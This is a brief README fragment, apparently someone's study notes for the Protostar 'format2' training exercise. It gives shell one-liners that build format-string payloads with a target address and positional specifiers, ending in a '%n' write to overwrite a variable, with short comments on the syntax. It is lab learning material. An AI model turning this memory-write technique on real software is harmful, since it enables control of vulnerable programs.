schen0x/assets/protostar/README-protostar.md

 ./format2 <<< $(echo -en "AAAA\xe4\x96\x04\x08BBBB";echo -en '%5$x')
   # now the &target is the 5th argument(in 32-bit hex) on the stack (AAAA is the 4th)
   # %5$: `%n$` a form of conversion specifications.
 The nth argument on the stack.
+  # careful do not trigger bash substitution "$x"
 ./format2 <<< $(echo -en "AAAA\xe4\x96\x04\x08BBBB";echo -en '%6$16d%5$x')
   # add padding on the printing format of %6$<len><type>
 ./format2 <<< $(echo -en "AAAA\xe4\x96\x04\x08BBBB";echo -en '%6$52x%5$n')